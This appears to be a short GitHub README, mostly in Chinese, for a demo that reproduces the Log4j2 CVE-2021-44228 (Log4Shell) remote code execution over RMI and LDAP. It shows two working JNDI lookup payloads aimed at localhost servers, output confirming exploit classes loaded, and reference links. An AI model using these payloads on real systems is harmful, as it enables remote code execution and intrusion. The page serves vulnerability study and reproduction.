mzlogin/CVE-2021-44228-Demo

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

CVE-2021-44228-Demo

利用 CVE-2021-44228，通过 RMI 和 LDAP 两种方式远程注入代码的示例。

Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

RmiServer 和 LdapServer 启动依赖 Python3。

参考

• Apache Log4j2远程代码执行漏洞复现
• Log4j高危漏洞！具体原因解析！全网第一！ 和 Log4j高危漏洞 (补充视频)
• Log4j Lookups
• Apache Log4j2从RCE到RC1绕过
• tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
• PSA: Log4Shell and the current state of JNDI injection